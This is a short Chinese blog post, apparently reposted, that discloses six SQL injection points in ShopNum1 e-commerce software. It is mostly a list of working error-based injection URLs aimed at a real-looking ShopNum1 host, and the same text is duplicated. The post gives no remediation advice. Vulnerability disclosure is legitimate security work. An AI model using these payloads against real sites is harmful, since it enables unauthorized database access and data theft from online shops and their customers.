ShopNum1某系统6处高危SQL注入漏洞

没穿底裤
没穿底裤
没穿底裤
714
文章
0
评论
2020年1月1日05:56:13评论687 views字数 647阅读2分9秒阅读模式
摘要

朋友分享了下源码,发现shopnum1的ShopNum1HttpModule是处理Http请求的类

上图就是一个注入点,构造链接是/VideoSearchList.aspx?VideoCategoryID=
之后我批量查下使用ShopNum1HttpModule的文件,发现好多问题:

http://nrqiang.shopnum1.com/VideoSearchList.aspx?VideoCategoryID=1%20and%20db_name()%3E0--
http://nrqiang.shopnum1.com/VideoDetail.aspx?Guid=111%27%20and%20db_name()%3E0--
http://nrqiang.shopnum1.com/ProductListCategory.aspx?ProductCategoryID=1%20and%20db_name()%3E0--
http://nrqiang.shopnum1.com/ArticleDetail.aspx?guid=1%27%20and%20db_name()%3E0%20--
http://nrqiang.shopnum1.com/ArticleDetailNew.aspx?guid=1%27%20and%20db_name()%3E0--
http://nrqiang.shopnum1.com/HelpList.aspx?Guid=1%27%20and%20db_name()%3E0--

朋友分享了下源码,发现shopnum1的ShopNum1HttpModule是处理Http请求的类
ShopNum1某系统6处高危SQL注入漏洞
上图就是一个注入点,构造链接是/VideoSearchList.aspx?VideoCategoryID=
之后我批量查下使用ShopNum1HttpModule的文件,发现好多问题:
ShopNum1某系统6处高危SQL注入漏洞
http://nrqiang.shopnum1.com/VideoSearchList.aspx?VideoCategoryID=1%20and%20db_name()%3E0--
http://nrqiang.shopnum1.com/VideoDetail.aspx?Guid=111%27%20and%20db_name()%3E0--
http://nrqiang.shopnum1.com/ProductListCategory.aspx?ProductCategoryID=1%20and%20db_name()%3E0--
http://nrqiang.shopnum1.com/ArticleDetail.aspx?guid=1%27%20and%20db_name()%3E0%20--
http://nrqiang.shopnum1.com/ArticleDetailNew.aspx?guid=1%27%20and%20db_name()%3E0--
http://nrqiang.shopnum1.com/HelpList.aspx?Guid=1%27%20and%20db_name()%3E0--
ShopNum1某系统6处高危SQL注入漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2020年1月1日05:56:13
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   ShopNum1某系统6处高危SQL注入漏洞http://cn-sec.com/archives/76619.html

发表评论

匿名网友 填写信息